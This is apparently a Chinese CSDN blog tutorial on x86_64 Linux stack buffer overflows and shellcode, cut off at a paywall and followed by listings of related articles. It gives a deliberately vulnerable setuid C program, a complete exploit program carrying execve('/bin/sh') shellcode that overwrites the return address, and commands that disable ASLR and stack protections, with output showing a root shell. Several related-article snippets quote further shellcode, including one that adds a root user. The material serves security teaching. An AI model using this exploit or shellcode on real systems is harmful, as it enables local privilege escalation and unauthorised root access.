linux x86_64 缓冲区溢出分析 以及 shellcode简介

最新推荐文章于 2023-07-06 10:35:40 发布
最新推荐文章于 2023-07-06 10:35:40 发布
阅读量1.8k 收藏 2
点赞数
分类专栏: security
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuimuyq/article/details/50523014
版权
本文详细介绍了Linux x86_64架构下的缓冲区溢出现象,重点关注如何利用栈溢出来覆盖rip寄存器,以及shellcode的基本概念。在x86_64系统中,内存地址为64位,但用户空间仅使用前47位。在调试过程中,通过设置shellcode地址,使得程序在main函数执行完毕后跳转到shellcode执行。文章还探讨了函数调用过程,包括rax、rbp、rsp和rip寄存器的作用,并通过gdb调试展示了main函数的retq指令执行流程。
摘要由CSDN通过智能技术生成 


/* buger.c */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(void) 
{
	char buffer[128] = {0};
	char *envp = NULL;

	printf("buffer address is: %p\n", &buffer);

	envp = getenv("KIRIKA");
	if (envp)
		strcpy(buffer, envp);

	return 0;	
}
代表有漏洞的可执行程序,并且该文件编译后的可执行文件设置有suid位,可以被利用提权 


/* hacker.c */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

extern char **environ;

int main(int argc, char **argv)
{
	char large_string[256] = {0};
	long *long_ptr = (long *)large_string;
	char shellcode[] = {"\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05"};
	unsigned long int bufaddr = strtoul(argv[2], NULL, 16);
	int i;

	for (i = 0; i < 6; i++) {
		large_string[152 + i] = bufaddr & 0xff;
		bufaddr >>= 8;
	}

	for (i = 0; i < 152; i++)
		large_string[i] = 'A';
	for (i = 0; i < strlen(shellcode); i++)
		large_string[i] = shellcode[i];

	setenv("KIRIKA", large_string, 1);
	execle(argv[1], argv[1], NULL, environ);

	return 0;
}
代表恶意可执行程序,利用buger程序实现提权


运行:

1: echo 0 > /proc/sys/kernel/randomize_va_space
2: gcc -z execstack -fno-stack-protector buger.c -o buger -g
3: chmod +s buger
4: gcc -z execstack -fno-stack-protector hacker.c -o hacker -g
5:	./hacker ./buger 0xff
	buffer address is: 0x7fffffffddb0
	Segmentation fault (core dumped)

6:	./hacker ./buger 0x7fffffffddb0
	buffer address is: 0x7fffffffddb0
	# exit


提权流程是这样的:
1: 设置环境变量KIRIKA的值, 注意一点是这是一个字符串, 如果shellcode里面有自负0x00就会出问题,因为字符串是以0x00结尾的
    "\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05"    //34B
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"            //118B
    "\x78\x56\x34\x12\xff\x7f"  
最低0.47元/天 解锁文章
shuimuyq
关注
专栏目录
Linux缓冲区溢出问题
张勤一
03-08 2921
##########################################                 缓冲区溢出(buffer overflow)机理分析                                    ##########################################
Linux中的基本x86-64bit缓冲区溢出
04-03
如果您正在研究白帽黑客攻击,那么最好了解用于溢出的旧策略。
linux 64位 shellcode,Linux Shellcode“你好,世界!”
weixin_36249942的博客
05-12 190
小编典典注入此shellcode时,您不知道位置message:mov ecx, message在注入的过程中,它可以是任何东西,但不会如此,"Helloworld!\r\n"因为仅转储文本部分时它位于数据部分。您可以看到您的shellcode没有"Hello world!\r\n":"\xb8\x04\x00\x00\x00""\xbb\x01\x00\x00\x00""\xb9\x00\x00...
Linux x86_64 shellcode的编写
小立仔
07-06 1620
Linux x86_64 shellcode的编写
64位系统的缓冲区溢出攻击实例
weixin_42582241的博客
12-10 1360
实验准备 Ubuntu 64位 实验:homework.exe homework12linux64bit.exe 在在64位Linux系统的运行结果: 可观察出其存在缓冲区溢出。 利用dbg对其进行调试: 用gdb装入可执行文件之后,立即反汇编main和foo函数: 此时的代码地址为静态地址(可执行文件中的代码地址)。 进程启动之后,反汇编main和foo函数: 在3个关键地址设置断点: 函数foo入口点的64位栈寄存器rsp保存了返回地址的指针(0x7fffffffde98),栈的内容为0x00005
X64 缓冲区溢出
weixin_41487541的博客
09-07 432
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 本篇旨在通过简单的例子来学习32位栈利用,随手记。 一、函数栈帧 每一个函数独占自己的栈帧空间。当前正在运行的函数栈帧总是在栈顶。Win32 系统提供两个特殊的寄存器用于表示位于系统栈顶端的栈帧:ESP(栈指针寄存器)和EBP(基址指针寄存器)。 在函数栈帧中,一般包括以下几...
缓冲区溢出攻击.pdf
04-15
Linux系统下,使用GCC编译器编译C代码时,如果代码没有进行适当的边界检查,就可能遭到缓冲区溢出攻击。 首先,要理解缓冲区溢出攻击的工作原理,需要对函数栈帧有一定的了解。在x86架构的CPU中,函数调用时会...
缓冲区溢出指南 1.pdf
最新发布
10-06
"缓冲区溢出指南" 缓冲区溢出是一种常见的网络安全漏洞,渗透测试员可以通过exploit来利用该漏洞,获取目标机器的控制权。以下是缓冲区溢出相关的知识点: 一、Exploit的定义 Exploit是一种特殊的脚本,旨在探测...
Linux 64位 shellcode
weixin_44442852的博客
10-20 1449
linux exec /bin/sh unsigned char code[] = "\x6a\x3b\x58\x99\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48" "\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f" "\x05"; int main(int argc, ch...
详解缓冲区溢出-ShellCode提取等
08-22
这算是比较详细的讲解缓冲区溢出攻防等利用手段 从入门到精通 我相信看完后 哪怕对缓冲区溢出闻所未闻的人 也能成为一个高手 个中意识及生动的讲解方式 课后练习等~~ 相对这方面的知识网上还很少 而且入门级的就更少了 这里忍疼风险出来 需要的账户和密码已经打包在压缩文件中
linux64 溢出,linux64位驻留缓冲区溢出
weixin_42318225的博客
05-12 129
我正在研究一些与安全有关的事情,现在我正在玩我自己的堆栈.我正在做的事应该非常简单,我甚至都没有尝试执行堆栈,只是为了表明我可以控制64位系统上的指令指针.我已经关闭了所有我能够使用它的保护机制(NX-bit,ASLR,也用-fno-stack-protector -z execstack编译).我没有那么多64位汇编的经验,花了一些时间搜索和试验自己后,我想知道是否有人可以解释我正在经历的问题....
Linux缓冲区溢出攻击及Shellcode
xumesang的专栏
05-07 4953
4.3.2 Linux32环境下函数的返回地址 编译、链接、执行程序buffer_overflow.c,并关闭Linux的栈保护机制,参见截图: 下面用gdb调试程序: 在foo函数的入口、调用strcpy函数处和foo返回处设置断点:   继续运行,找到函数的返回地址:   buff的起始地址B到保存函数的返回地址A之间的偏移: A-B=0xbffff29c-
记一次Windows 64位缓冲区溢出
weixin_41487541的博客
10-14 603
以下为原文链接,但是我在复现时出了些问题;在实现方面也与原文有所不同。 https://www.coalfire.com/the-coalfire-blog/september-2020/the-basics-of-exploit-development-5-x86-64-buffer 环境 Win10 18363 + x64dbg; 原文中还使用了x64dbg的ERC插件,但是通过观察栈帧、计算偏移也可以实现。 以下为溢出样本代码。 #include <iostream> #
逆向工程日记之缓冲区溢出的利用-ShellCode编写
wixinbibiu123的博客
10-04 879
缓冲区溢出的利用-ShellCode编写前言实验前提所需基础缓冲区溢出原理简单介绍概要ShellCode介绍实验开始get_jmp.exe的运行结果对text2.exe进行逆向分析。 前言 Hello,各位广大的网友们好。笔者为大二在校大学生,软件学院。为践行费曼学习法,并在前辈的建议下开始写自己的一系列博客,之前用一篇文章大概的诠释了缓冲区溢出的基本原理,本文将以此为基础进行缓冲区溢出利用的研究...
linux x64 shellcode,Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)
weixin_42118161的博客
05-12 140
; Title: add root user (toor:toor); Date: 20180811; Author: epi ; https://epi052.gitlab.io/notes-to-self/; Tested on: linux/x86_64 (SMP CentOS-7 3.10.0-862.2.3.el7.x86_64 GNU/Linux);; Shellcode Leng...
缓冲区溢出】栈溢出原理 | 简单shellcode编写
VI___
02-02 4589
一、Buffer Overflow Vulnerability ESP:该指针永远指向系统栈最上面一个栈帧的栈顶 EBP:该指针永远指向系统栈最上面一个栈帧的底部 缓冲区溢出漏洞的原理就是因为输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符将返回地址覆盖掉了,当函数需要返回的时候,由于此时的返回地址是一个无效地址,因此导致程序出错。 那...
shellcode,缓冲区溢出漏洞及 远程调call
任鸟飞2217777779的博客
02-13 1331
这个函数分配了8个字节的缓冲区,然后通过 strcpy 函数将传进来的字符串复制到缓冲区中,最后输出,如果传入的字符串大于 8的话就会发生溢出,并向后覆盖堆栈中的信息,如果只是一些乱码的话那个最多造成程序崩溃,如果传入的是一段精心设计的代码,那么计算机可能回去执行这段攻击代码。我们的shellcode 不能有00,否则 strcpy 会提前结束,所以 上面的代码中有字符串00结尾,需要我们修改成其他的代码形式。我们只要把返回地址覆盖成我们要执行的代码地址,就可以让该函数返回的时候去顺利执行我们的代码了.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值